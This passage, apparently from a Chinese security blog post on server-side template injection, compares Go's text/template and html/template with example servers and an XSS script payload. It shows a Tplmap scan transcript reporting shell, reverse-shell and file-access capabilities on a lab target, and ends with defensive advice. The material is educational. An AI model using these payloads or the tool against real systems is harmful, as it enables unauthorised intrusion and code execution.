http.ResponseWriter, r *http.Request) &#123;</span><br><span class="line">    user := &amp;User&#123;1,&quot;John&quot;, &quot;test@example.com&quot;, &quot;test123&quot;&#125;</span><br><span class="line">    r.ParseForm()</span><br><span class="line">    tpl := `&lt;h1&gt;Hi, &#123;&#123;&quot;&lt;script&gt;alert(/xss/)&lt;/script&gt;&quot;&#125;&#125;&lt;/h1&gt;&lt;br&gt;Your Email is &#123;&#123; .Email &#125;&#125;`</span><br><span class="line">    data := map[string]string&#123;</span><br><span class="line">        &quot;Name&quot;:  user.Name,</span><br><span class="line">        &quot;Email&quot;: user.Email,</span><br><span class="line">    &#125;</span><br><span class="line">    html := template.Must(template.New(&quot;login&quot;).Parse(tpl))</span><br><span class="line">    html.Execute(w, data)</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">func main() &#123;</span><br><span class="line">    server := http.Server&#123;</span><br><span class="line">        Addr: &quot;127.0.0.1:8888&quot;,</span><br><span class="line">    &#125;</span><br><span class="line">    http.HandleFunc(&quot;/string&quot;, StringTpl2Exam)</span><br><span class="line">    server.ListenAndServe()</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">模板内容 &lt;h1&gt;Hi, &#123;&#123;&quot;&lt;script&gt;alert(/xss/)&lt;/script&gt;&quot;&#125;&#125;&lt;/h1&gt;&lt;br&gt;Your Email is &#123;&#123; .Email &#125;&#125;</span><br><span class="line">期待输出 &lt;h1&gt;Hi, &#123;&#123;&quot;&lt;script&gt;alert(/xss/)&lt;/script&gt;&quot;&#125;&#125;&lt;/h1&gt;&lt;br&gt;Your Email is test@example.com</span><br><span class="line">实际输出 弹出/xss/</span><br></pre></td></tr></table></figure>
<p>这里就是 text/template 和 html/template 的最大不同了</p>
<h3 id="htmltemplate"><a class="markdownIt-Anchor" href="#htmltemplate">#</a> html/template</h3>
<p>同样的例子，但是我们把导入的模板包变成 html/template</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br></pre></td><td class="code"><pre><span class="line">package main</span><br><span class="line"></span><br><span class="line">import (</span><br><span class="line">    &quot;net/http&quot;</span><br><span class="line">    &quot;html/template&quot;</span><br><span class="line">)</span><br><span class="line"></span><br><span class="line">type User struct &#123;</span><br><span class="line">    ID       int</span><br><span class="line">    Name  string</span><br><span class="line">    Email    string</span><br><span class="line">    Password string</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">func StringTpl2Exam(w http.ResponseWriter, r *http.Request) &#123;</span><br><span class="line">    user := &amp;User&#123;1,&quot;John&quot;, &quot;test@example.com&quot;, &quot;test123&quot;&#125;</span><br><span class="line">    r.ParseForm()</span><br><span class="line">    tpl := `&lt;h1&gt;Hi, &#123;&#123;&quot;&lt;script&gt;alert(/xss/)&lt;/script&gt;&quot;&#125;&#125;&lt;/h1&gt;&lt;br&gt;Your Email is &#123;&#123; .Email &#125;&#125;`</span><br><span class="line">    data := map[string]string&#123;</span><br><span class="line">        &quot;Name&quot;:  user.Name,</span><br><span class="line">        &quot;Email&quot;: user.Email,</span><br><span class="line">    &#125;</span><br><span class="line">    html := template.Must(template.New(&quot;login&quot;).Parse(tpl))</span><br><span class="line">    html.Execute(w, data)</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">func main() &#123;</span><br><span class="line">    server := http.Server&#123;</span><br><span class="line">        Addr: &quot;127.0.0.1:8888&quot;,</span><br><span class="line">    &#125;</span><br><span class="line">    http.HandleFunc(&quot;/string&quot;, StringTpl2Exam)</span><br><span class="line">    server.ListenAndServe()</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p><img data-src="https://kbshire-1308981697.cos.ap-shanghai.myqcloud.com/img/640" alt="图片"></p>
<p>可以看到，xss 语句已经被转义实体化了，因此对于 html/template 来说，传入的 script 和 js 都会被转义，很好地防范了 xss，但 text/template 也提供了内置函数 html 来转义特殊字符，除此之外还有 js，也存在 <code>template.HTMLEscapeString</code>  等转义函数</p>
<h3 id="template常用基本语法"><a class="markdownIt-Anchor" href="#template常用基本语法">#</a> template 常用基本语法</h3>
<p>在 <code>&#123;&#123;&#125;&#125;`内的操作称之为pipeline

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123;.&#125;&#125; 表示当前对象，如user对象</span><br><span class="line"></span><br><span class="line">&#123;&#123;.FieldName&#125;&#125; 表示对象的某个字段</span><br><span class="line"></span><br><span class="line">&#123;&#123;range …&#125;&#125;&#123;&#123;end&#125;&#125; go中for…range语法类似，循环</span><br><span class="line"></span><br><span class="line">&#123;&#123;with …&#125;&#125;&#123;&#123;end&#125;&#125; 当前对象的值，上下文</span><br><span class="line"></span><br><span class="line">&#123;&#123;if …&#125;&#125;&#123;&#123;else&#125;&#125;&#123;&#123;end&#125;&#125; go中的if-else语法类似，条件选择</span><br><span class="line"></span><br><span class="line">&#123;&#123;xxx | xxx&#125;&#125; 左边的输出作为右边的输入</span><br><span class="line"></span><br><span class="line">&#123;&#123;template &quot;navbar&quot;&#125;&#125; 引入子模版</span><br></pre></td></tr></table></figure>

在go中检测 SSTI 并不像发送 &#123;&#123;7*7&#125;&#125; 并在源代码中检查 49 那么简单，我们需要浏览文档以查找仅 Go 原生模板中的行为，最常见的就是占位符</code> .`</p>
<p>在 template 中，点 &quot;.&quot; 代表当前作用域的当前对象，它类似于 java/c++ 的 this 关键字，类似于 perl/python 的 self</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br></pre></td><td class="code"><pre><span class="line">package main</span><br><span class="line"></span><br><span class="line">import (</span><br><span class="line">    &quot;net/http&quot;</span><br><span class="line">    &quot;text/template&quot;</span><br><span class="line">)</span><br><span class="line"></span><br><span class="line">type User struct &#123;</span><br><span class="line">    ID       int</span><br><span class="line">    Name  string</span><br><span class="line">    Email    string</span><br><span class="line">    Password string</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">func StringTpl2Exam(w http.ResponseWriter, r *http.Request) &#123;</span><br><span class="line">    user := &amp;User&#123;1,&quot;John&quot;, &quot;test@example.com&quot;, &quot;test123&quot;&#125;</span><br><span class="line">    r.ParseForm()</span><br><span class="line">    tpl := `&lt;h1&gt;Hi, &#123;&#123; .Name &#125;&#125;&lt;/h1&gt;&lt;br&gt;Your Email is &#123;&#123; . &#125;&#125;`</span><br><span class="line">    data := map[string]string&#123;</span><br><span class="line">        &quot;Name&quot;:  user.Name,</span><br><span class="line">        &quot;Email&quot;: user.Email,</span><br><span class="line">    &#125;</span><br><span class="line">    html := template.Must(template.New(&quot;login&quot;).Parse(tpl))</span><br><span class="line">    html.Execute(w, data)</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">func main() &#123;</span><br><span class="line">    server := http.Server&#123;</span><br><span class="line">        Addr: &quot;127.0.0.1:8888&quot;,</span><br><span class="line">    &#125;</span><br><span class="line">    http.HandleFunc(&quot;/string&quot;, StringTpl2Exam)</span><br><span class="line">    server.ListenAndServe()</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>输出为</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">模板内容 &lt;h1&gt;Hi, &#123;&#123; .Name &#125;&#125;&lt;/h1&gt;&lt;br&gt;Your Email is &#123;&#123; . &#125;&#125;</span><br><span class="line">期待输出 &lt;h1&gt;Hi, John&lt;/h1&gt;&lt;br&gt;Your Email is map[Email:test@example.com Name:John]</span><br></pre></td></tr></table></figure>
<p>可以看到结构体内的都会被打印出来，我们也常常利用这个检测是否存在 SSTI</p>
<p><span class="exturl" data-url="aHR0cHM6Ly9tcC53ZWl4aW4ucXEuY29tL3MvaTlLckNwNW4tSkljeGFLYUdYal9yUQ==">浅学 Go 下的 ssti (qq.com)</span></p>
<p>最后在放上我的</p>
<p><span class="exturl" data-url="aHR0cHM6Ly9uYW90dS5iYWlkdS5jb20vZmlsZS82Y2M1MDkzY2VkMzI2OTZmYmRkZTYyYzRiYmNhNGIxMg==">新建脑图 - 百度脑图 (baidu.com)</span></p>
<h2 id="tplmap"><a class="markdownIt-Anchor" href="#tplmap">#</a> Tplmap</h2>
<p><span class="exturl" data-url="aHR0cHM6Ly9naXRodWIuY29tL2VwaW5uYS90cGxtYXA=">https://github.com/epinna/tplmap</span></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">pip install PyYaml</span><br></pre></td></tr></table></figure>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br></pre></td><td class="code"><pre><span class="line">root@kali:/mnt/hgfs/共享文件夹/tplmap-master# python tplmap.py -u &quot;http://192.168.1.10:8000/?name=Sea&quot;                             //判断是否是注入点</span><br><span class="line">[+] Tplmap 0.5</span><br><span class="line">    Automatic Server-Side Template Injection Detection and Exploitation Tool</span><br><span class="line"></span><br><span class="line">[+] Testing if GET parameter &#x27;name&#x27; is injectable</span><br><span class="line">[+] Smarty plugin is testing rendering with tag &#x27;*&#x27;</span><br><span class="line">[+] Smarty plugin is testing blind injection</span><br><span class="line">[+] Mako plugin is testing rendering with tag &#x27;$&#123;*&#125;&#x27;</span><br><span class="line">[+] Mako plugin is testing blind injection</span><br><span class="line">[+] Python plugin is testing rendering with tag &#x27;str(*)&#x27;</span><br><span class="line">[+] Python plugin is testing blind injection</span><br><span class="line">[+] Tornado plugin is testing rendering with tag &#x27;&#123;&#123;*&#125;&#125;&#x27;</span><br><span class="line">[+] Tornado plugin is testing blind injection</span><br><span class="line">[+] Jinja2 plugin is testing rendering with tag &#x27;&#123;&#123;*&#125;&#125;&#x27;</span><br><span class="line">[+] Jinja2 plugin has confirmed injection with tag &#x27;&#123;&#123;*&#125;&#125;&#x27;</span><br><span class="line">[+] Tplmap identified the following injection point:</span><br><span class="line"></span><br><span class="line">  GET parameter: name                //说明可以注入，同时给出了详细信息</span><br><span class="line">  Engine: Jinja2</span><br><span class="line">  Injection: &#123;&#123;*&#125;&#125;</span><br><span class="line">  Context: text</span><br><span class="line">  OS: posix-linux</span><br><span class="line">  Technique: render</span><br><span class="line">  Capabilities:</span><br><span class="line"></span><br><span class="line">   Shell command execution: ok           //检验出这些利用方法对于目标环境是否可用</span><br><span class="line">   Bind and reverse shell: ok</span><br><span class="line">   File write: ok</span><br><span class="line">   File read: ok</span><br><span class="line">   Code evaluation: ok, python code</span><br><span class="line"></span><br><span class="line">[+] Rerun tplmap providing one of the following options:</span><br><span class="line">                                                                  //可以利用下面这些参数进行进一步的操作</span><br><span class="line">    --os-shell				Run shell on the target</span><br><span class="line">    --os-cmd				Execute shell commands</span><br><span class="line">    --bind-shell PORT			Connect to a shell bind to a target port</span><br><span class="line">    --reverse-shell HOST PORT	Send a shell back to the attacker&#x27;s port</span><br><span class="line">    --upload LOCAL REMOTE	Upload files to the server</span><br><span class="line">    --download REMOTE LOCAL	Download remote files</span><br></pre></td></tr></table></figure>
<h2 id="ssti-的防护"><a class="markdownIt-Anchor" href="#ssti-的防护">#</a> SSTI 的防护</h2>
<p>(1) 和其他的注入防御一样，绝对不要让用户对传入模板的内容或者模板本身进行控制。<br>
(2) 减少或者放弃直接使用格式化字符串结合字符串拼接的模板渲染方式，使用正规的模板渲染方法。</p>

  </div>

   <footer>

    <div class="meta">
  <span class="item">
    <span class="icon">
      <i class="ic i-calendar-check"></i>
    </span>
    <span class="text">Edited on</span>
    <time title="Modified: 2022-12-04 12:21:10" itemprop="dateModified" datetime="2022-12-04T12:21:10+08:00">2022-12-04</time>
  </span>
</div>

      
<div class="reward">
  <button><i class="ic i-heartbeat"></i> Donate</button>
  <p>Give me a cup of [coffee]~(￣▽￣)~*</p>
  <div id="qr">
      
      <div>
        <img data-src="/images/wechatpay.png" alt="John Doe WeChat Pay">
        <p>WeChat Pay</p>
      </div>
      
      <div>
        <img data-src="/images/alipay.png" alt="John Doe Alipay">
        <p>Alipay</p>
      </div>
      
      <div>
        <img data-src="/images/paypal.png" alt="John Doe PayPal">
        <p>PayPal</p>
      </div>
  </div>
</div>

      

<div id="copyright">
<ul>
  <li class="author">
    <strong>Post author:  </strong>John Doe <i class="ic i-at"><em>@</em></i>Hexo
  </li>
  <li class="link">
    <strong>Post link: </strong>
    <a href="http://example.com/2022/12/27/SSTI/" title="SSTI">http://example.com/2022/12/27/SSTI/</a>
  </li>
  <li class="license">
    <strong>Copyright Notice:  </strong>All articles in this blog are licensed under <span class="exturl" data-url="aHR0cHM6Ly9jcmVhdGl2ZWNvbW1vbnMub3JnL2xpY2Vuc2VzL2J5LW5jLXNhLzQuMC9kZWVkLnpo"><i class="ic i-creative-commons"><em>(CC)</em></i>BY-NC-SA</span> unless stating additionally.
  </li>
</ul>
</div>

  </footer>

</article>

  </div>
  

<div class="post-nav">
    <div class="item left">
      

  <a href="/2022/12/25/%E5%86%85%E7%BD%91/" itemprop="url" rel="prev" data-background-image="https:&#x2F;&#x2F;tva2.sinaimg.cn&#x2F;mw690&#x2F;6833939bly1gipevarprfj20zk0m8npd.jpg" title="内网渗透">
  <span class="type">Previous Post</span>
  <span class="category"><i class="ic i-flag"></i> 内网</span>
  <h3>内网渗透</h3>
  </a>

    </div>
    <div class="item right">
      

  <a href="/2022/12/28/mysql/" itemprop="url" rel="next" data-background-image="https:&#x2F;&#x2F;tva2.sinaimg.cn&#x2F;mw690&#x2F;6833939bly1gicliierfjj20zk0m8npd.jpg" title="Mysql">
  <span class="type">Next Post</span>
  <span class="category"><i class="ic i-flag"></i> </span>
  <h3>Mysql</h3>
  </a>

    </div>
</div>

  
  <div class="wrap" id="comments"></div>


        </div>
        <div id="sidebar">
          

<div class="inner">

  <div class="panels">
    <div class="inner">
      <div class="contents panel pjax" data-title="Contents">
          <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#ssti"><span class="toc-number">1.</span> <span class="toc-text"> SSTI</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%A8%A1%E6%9D%BF%E5%BC%95%E6%93%8E"><span class="toc-number">1.1.</span> <span class="toc-text"> 模板引擎</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#ssti-%E6%A8%A1%E6%9D%BF%E6%B3%A8%E5%85%A5"><span class="toc-number">1.2.</span> <span class="toc-text"> SSTI 模板注入</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#php"><span class="toc-number">1.3.</span> <span class="toc-text"> PHP</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#twig"><span class="toc-number">1.3.1.</span> <span class="toc-text"> twig</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#smarty"><span class="toc-number">1.3.2.</span> <span class="toc-text"> smarty</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#python"><span class="toc-number">1.4.</span> <span class="toc-text"> python</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#flaskjinja2"><span class="toc-number">1.4.1.</span> <span class="toc-text"> Flask&amp;jinja2</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#route"><span class="toc-number">1.4.1.1.</span> <span class="toc-text"> route</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%A8%A1%E6%9D%BF%E6%B8%B2%E6%9F%93"><span class="toc-number">1.4.1.2.</span> <span class="toc-text"> 模板渲染</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#flaskjinja2%E6%A8%A1%E6%9D%BF%E6%B3%A8%E5%85%A5"><span class="toc-number">1.4.1.3.</span> <span class="toc-text"> Flask&#x2F;jinja2 模板注入</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#tornado"><span class="toc-number">1.4.2.</span> <span class="toc-text"> tornado</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#java"><span class="toc-number">1.5.</span> <span class="toc-text"> java</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#velocity"><span class="toc-number">1.5.1.</span> <span class="toc-text"> velocity</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#thymeleaf"><span class="toc-number">1.5.2.</span> <span class="toc-text"> Thymeleaf</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#ruby"><span class="toc-number">1.6.</span> <span class="toc-text"> ruby</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#erb"><span class="toc-number">1.6.1.</span> <span class="toc-text"> ERB</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#go"><span class="toc-number">1.7.</span> <span class="toc-text"> go</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#texttemplate"><span class="toc-number">1.7.1.</span> <span class="toc-text"> text&#x2F;template</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#htmltemplate"><span class="toc-number">1.7.2.</span> <span class="toc-text"> html&#x2F;template</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#template%E5%B8%B8%E7%94%A8%E5%9F%BA%E6%9C%AC%E8%AF%AD%E6%B3%95"><span class="toc-number">1.7.3.</span> <span class="toc-text"> template 常用基本语法</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#tplmap"><span class="toc-number">1.8.</span> <span class="toc-text"> Tplmap</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#ssti-%E7%9A%84%E9%98%B2%E6%8A%A4"><span class="toc-number">1.9.</span> <span class="toc-text"> SSTI 的防护</span></a></li></ol></li></ol>
      </div>
      <div class="related panel pjax" data-title="Related">
        <ul>
          <li><a href="/2022/03/16/SQL%E6%B3%A8%E5%85%A5/" rel="bookmark" title="SQL injection">SQL injection</a></li><li><a href="/2022/04/16/Upload/" rel="bookmark" title="File upload">File upload</a></li><li><a href="/2022/05/17/include/" rel="bookmark" title="file include">file include</a></li><li><a href="/2022/05/27/CSRF/" rel="bookmark" title="CSRF">CSRF</a></li><li><a href="/2022/06/27/SSRF/" rel="bookmark" title="SSRF">SSRF</a></li><li><a href="/2022/08/16/Unserialize/" rel="bookmark" title="unserialize">unserialize</a></li><li><a href="/2022/11/17/JWT%20%E5%9F%BA%E7%A1%80/" rel="bookmark" title="JWT">JWT</a></li><li><a href="/2022/11/27/CDN/" rel="bookmark" title="CDN&DNS">CDN&DNS</a></li><li><a href="/2022/11/27/Docker%E9%80%83%E9%80%B8/" rel="bookmark" title="docker逃逸&capabilities">docker逃逸&capabilities</a></li><li class="active"><a href="/2022/12/27/SSTI/" rel="bookmark" title="SSTI">SSTI</a></li><li><a href="/2022/12/31/webshell/" rel="bookmark" title="webshell">webshell</a></li>
        </ul>
      </div>
      <div class="overview panel" data-title="Overview">
        <div class="author" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <img class="image" itemprop="image" alt="John Doe"
      data-src="/images/avatar.jpg">
  <p class="name" itemprop="name">John Doe</p>
  <div class="description" itemprop="description"></div>
</div>

<nav class="state">
    <div class="item posts">
      <a href="/archives/">
        <span class="count">24</span>
        <span class="name">posts</span>
      </a>
    </div>
    <div class="item categories">
      <a href="/categories/">
        <span class="count">4</span>
        <span class="name">categories</span>
      </a>
    </div>
    <div class="item tags">
      <a href="/tags/">
        <span class="count">4</span>
        <span class="name">tags</span>
      </a>
    </div>
</nav>

<div class="social">
</div>

<ul class="menu">
  
    
  <li class="item">
    <a href="/" rel="section"><i class="ic i-home"></i>Home</a>
  </li>


</ul>

      </div>
    </div>
  </div>

  <ul id="quick">
    <li class="prev pjax">
        <a href="/2022/12/25/%E5%86%85%E7%BD%91/" rel="prev" title="Previous Post"><i class="ic i-chevron-left"></i></a>
    </li>
    <li class="up"><i class="ic i-arrow-up"></i></li>
    <li class="down"><i class="ic i-arrow-down"></i></li>
    <li class="next pjax">
        <a href="/2022/12/28/mysql/" rel="next" title="Next Post"><i class="ic i-chevron-right"></i></a>
    </li>
    <li class="percent"></li>
  </ul>
</div>


        </div>
        <div class="dimmer"></div>
      </div>
    </main>
    <footer id="footer">
      <div class="inner">
        <div class="widgets">
          
<div class="rpost pjax">
  <h2>Random Posts</h2>
  <ul>
      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/web%E5%AE%89%E5%85%A8/" title="In web安全">web安全</a>
</div>

    <span><a href="/2022/11/17/JWT%20%E5%9F%BA%E7%A1%80/" title="JWT">JWT</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/web%E5%AE%89%E5%85%A8/" title="In web安全">web安全</a>
</div>

    <span><a href="/2022/05/17/include/" title="file include">file include</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/%E5%86%85%E7%BD%91/" title="In 内网">内网</a>
</div>

    <span><a href="/2022/05/27/emergency%20response/" title="应急响应">应急响应</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/web%E5%AE%89%E5%85%A8/" title="In web安全">web安全</a>
</div>

    <span><a href="/2022/12/27/SSTI/" title="SSTI">SSTI</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/%E7%A7%8B%E6%8B%9B/" title="In 秋招">秋招</a>
</div>

    <span><a href="/2022/10/28/%E7%A7%8B%E6%8B%9B%E9%9D%A2%E8%AF%95%E9%A2%98/" title="秋招面试题">秋招面试题</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/web%E5%AE%89%E5%85%A8/" title="In web安全">web安全</a>
</div>

    <span><a href="/2022/05/27/CSRF/" title="CSRF">CSRF</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/web%E5%AE%89%E5%85%A8/" title="In web安全">web安全</a>
</div>

    <span><a href="/2022/04/16/Upload/" title="File upload">File upload</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/web%E5%AE%89%E5%85%A8/" title="In web安全">web安全</a>
</div>

    <span><a href="/2022/03/16/SQL%E6%B3%A8%E5%85%A5/" title="SQL injection">SQL injection</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
</div>

    <span><a href="/2022/10/30/%E5%8F%91%E7%8E%B0%E5%B0%8F%E5%8F%AF%E7%88%B1%EF%BC%81/" title="about me">about me</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/%E9%80%86%E5%90%91/" title="In 逆向">逆向</a>
</div>

    <span><a href="/2022/11/11/reverse/" title="逆向">逆向</a></span>
  </li>

  </ul>
</div>
<div>
  <h2>Recent Comments</h2>
  <ul class="leancloud-recent-comment"></ul>
</div>

        </div>
        <div class="status">
  <div class="copyright">
    
    &copy; 2010 – 
    <span itemprop="copyrightYear">2023</span>
    <span class="with-love">
      <i class="ic i-sakura rotate"></i>
    </span>
    <span class="author" itemprop="copyrightHolder">John Doe @ Yume Shoka</span>
  </div>
  <div class="powered-by">
    Powered by <span class="exturl" data-url="aHR0cHM6Ly9oZXhvLmlv">Hexo</span> & Theme.<span class="exturl" data-url="aHR0cHM6Ly9naXRodWIuY29tL2FtZWhpbWUvaGV4by10aGVtZS1zaG9rYQ==">Shoka</span>
  </div>
</div>

      </div>
    </footer>
  </div>
<script data-config type="text/javascript">
  var LOCAL = {
    path: '2022/12/27/SSTI/',
    favicon: {
      show: "（●´3｀●）Goooood",
      hide: "(´Д｀)Booooom"
    },
    search : {
      placeholder: "Search for Posts",
      empty: "We didn't find any results for the search: ${query}",
      stats: "${hits} results found in ${time} ms"
    },
    valine: true,fancybox: true,
    copyright: 'Copied to clipboard successfully! <br> All articles in this blog are licensed under <i class="ic i-creative-commons"></i>BY-NC-SA.',
    ignores : [
      function(uri) {
        return uri.includes('#');
      },
      function(uri) {
        return new RegExp(LOCAL.path+"$").test(uri);
      }
    ]
  };
</script>

<script src="https://cdn.polyfill.io/v2/polyfill.js"></script>

<script src="//cdn.jsdelivr.net/combine/npm/pace-js@1.0.2/pace.min.js,npm/pjax@0.2.8/pjax.min.js,npm/whatwg-fetch@3.4.0/dist/fetch.umd.min.js,npm/animejs@3.2.0/lib/anime.min.js,npm/algoliasearch@4/dist/algoliasearch-lite.umd.js,npm/instantsearch.js@4/dist/instantsearch.production.min.js,npm/lozad@1/dist/lozad.min.js,npm/quicklink@2/dist/quicklink.umd.js"></script>

<script src="/js/app.js?v=0.2.5"></script>




</body>
</html>
